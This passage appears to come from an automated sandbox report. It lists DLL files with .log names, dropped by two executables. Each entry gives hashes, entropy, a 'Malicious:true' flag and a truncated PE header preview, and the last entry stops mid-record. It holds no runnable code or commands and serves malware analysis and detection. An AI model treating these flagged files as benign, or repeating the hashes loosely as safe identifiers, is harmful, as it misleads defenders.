                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\hhWvCZxk.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\hxXYHhry.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\iLUfkInD.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ijuwfDOX.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\iqYOFZDy.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\jKmGQQAV.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\jpnvyeqG.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\jsgdIvVc.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\lHcvfWDY.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\lgAYTQQj.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\lkpWjeGm.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\lvRXXeLO.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\mBLWrFnw.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\mFCPuWEK.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\nimHpzUe.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\nlafNFtr.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\nyDFtNQJ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\olpMFKgz.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\pafNrbGf.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\phiwHSJM.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
